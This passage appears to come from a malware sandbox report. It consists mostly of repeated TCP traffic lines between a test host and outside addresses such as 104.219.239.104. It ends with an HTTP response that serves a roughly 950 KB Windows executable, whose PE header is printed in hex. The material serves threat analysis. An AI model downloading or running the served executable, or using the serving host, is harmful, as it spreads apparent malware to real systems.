                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 09:07:21 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 16 Jul 2024 19:13:36 GMTETag: "e8400-61d6224798859"Accept-Ranges: bytesContent-Length: 951296Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 c6 96 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 1e 96 0e 00 00 20 00 00 00 a0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c9 95 0e 00 4f 00 00 00 00 a0 0e 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 28 6d 0e 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 76 0e 00 00 20 00 00 00 78 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 06 00 00 00 a0 0e 00 00 08 00 00 00 7a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 82 0e 00 00 00 00 